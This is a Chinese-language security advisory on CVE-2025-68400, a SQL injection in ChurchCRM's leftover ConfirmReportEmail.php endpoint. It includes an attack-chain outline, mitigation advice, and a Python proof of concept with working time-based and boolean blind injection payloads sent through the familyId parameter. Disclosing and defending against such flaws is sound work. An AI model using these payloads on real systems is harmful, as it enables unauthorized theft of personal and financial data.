CVE-2025-68400 ChurchCRM SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-68400

漏洞类型

SQL注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ChurchCRM

漏洞概述

ChurchCRM是一款开源教会管理系统，广泛应用于各类宗教组织的日常运营管理中。该系统存在一个严重的安全漏洞，编号为CVE-2025-68400，CVSS评分高达8.8分，属于高危漏洞。漏洞位于遗留端点`/Reports/ConfirmReportEmail.php`文件中，是一个典型的SQL注入缺陷。尽管该功能已从用户界面中移除，但相关文件仍然部署在服务器上且可直接通过URL访问，这构成了一种"已死亡但仍可访问的代码"的安全隐患。攻击者可以利用此漏洞，通过未经过滤的`familyId`参数注入恶意SQL语句，从而实现对数据库的非法访问和操作。值得注意的是，任何已认证用户均可利用此漏洞，包括被分配零权限的用户，这大大降低了攻击门槛。攻击成功后，攻击者可能窃取敏感数据、修改数据库内容，甚至在某些情况下实现远程代码执行。该漏洞已在6.5.3版本中得到修复。

技术细节

该SQL注入漏洞源于ChurchCRM系统中`/Reports/ConfirmReportEmail.php`文件对用户输入参数缺乏有效的安全过滤和参数化查询处理。攻击者可通过HTTP请求中的`familyId`参数注入恶意SQL代码片段。由于系统未对该参数进行严格的输入验证和类型检查，攻击者构造的SQL语句将被数据库服务器直接执行。在正常情况下，该功能的UI入口已被移除，但服务器上仍保留着可被直接访问的PHP文件，形成了一个隐藏的攻击面。攻击者只需获取系统账户（即使没有任何权限），即可通过发送精心构造的HTTP请求来利用此漏洞。漏洞利用成功的关键在于`familyId`参数被直接拼接到SQL查询语句中，而未使用预编译语句或参数化查询。攻击者可以利用UNION SELECT、布尔盲注或时间盲注等技术来提取数据库中的敏感信息，包括用户凭证、教会财务数据、个人隐私信息等。

攻击链分析

STEP 1

步骤1

攻击者获取ChurchCRM系统的有效用户账户（任何权限级别的账户均可，包括零权限账户）

STEP 2

步骤2

攻击者直接访问遗留端点/Reports/ConfirmReportEmail.php，绕过已移除的UI入口

STEP 3

步骤3

攻击者通过familyId参数注入恶意SQL代码构造注入载荷

STEP 4

步骤4

服务器将未过滤的用户输入直接拼接到SQL查询语句中执行

STEP 5

步骤5

攻击者利用UNION注入或盲注技术提取数据库中的敏感信息

STEP 6

步骤6

攻击者可能进一步利用获取的信息进行权限提升或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-68400 PoC - ChurchCRM SQL Injection
# Target: /Reports/ConfirmReportEmail.php
# Parameter: familyId

def exploit_sqli(target_url, session_cookie):
    headers = {
        'Cookie': session_cookie,
        'User-Agent': 'Mozilla/5.0'
    }
    
    # Blind SQL Injection - extract database version
    # Using time-based blind injection technique
    payload_true = "1 AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)"
    payload_false = "1 AND (SELECT CASE WHEN (1=2) THEN SLEEP(5) ELSE 0 END)"
    
    # True condition - should delay response
    url_true = f"{target_url}/Reports/ConfirmReportEmail.php?familyId={payload_true}"
    # False condition - should respond quickly
    url_false = f"{target_url}/Reports/ConfirmReportEmail.php?familyId={payload_false}"
    
    print(f"[*] Testing true condition: {payload_true}")
    try:
        resp_true = requests.get(url_true, headers=headers, timeout=10)
        print(f"[+] Response time: {resp_true.elapsed.total_seconds()}s")
    except requests.exceptions.Timeout:
        print("[+] Time-based blind injection confirmed!")
    
    # Boolean-based injection example
    payload_db = "1 AND ASCII(SUBSTRING((SELECT database()),1,1))>64"
    url_db = f"{target_url}/Reports/ConfirmReportEmail.php?familyId={payload_db}"
    print(f"[*] Testing database name extraction: {payload_db}")
    
    return True

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <PHPSESSID_cookie>")
        print(f"Example: python {sys.argv[0]} http://churchcrm.example.com 'PHPSESSID=abc123'")
        sys.exit(1)
    
    target = sys.argv[1]
    cookie = sys.argv[2]
    exploit_sqli(target, cookie)

影响范围

ChurchCRM < 6.5.3

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1）通过Web服务器配置（如Apache的.htaccess或Nginx配置）禁止访问/Reports/ConfirmReportEmail.php文件；2）临时关闭Reports模块功能；3）加强用户认证和会话管理，监控异常访问行为；4）启用数据库查询日志和告警机制，及时发现可疑的SQL注入尝试。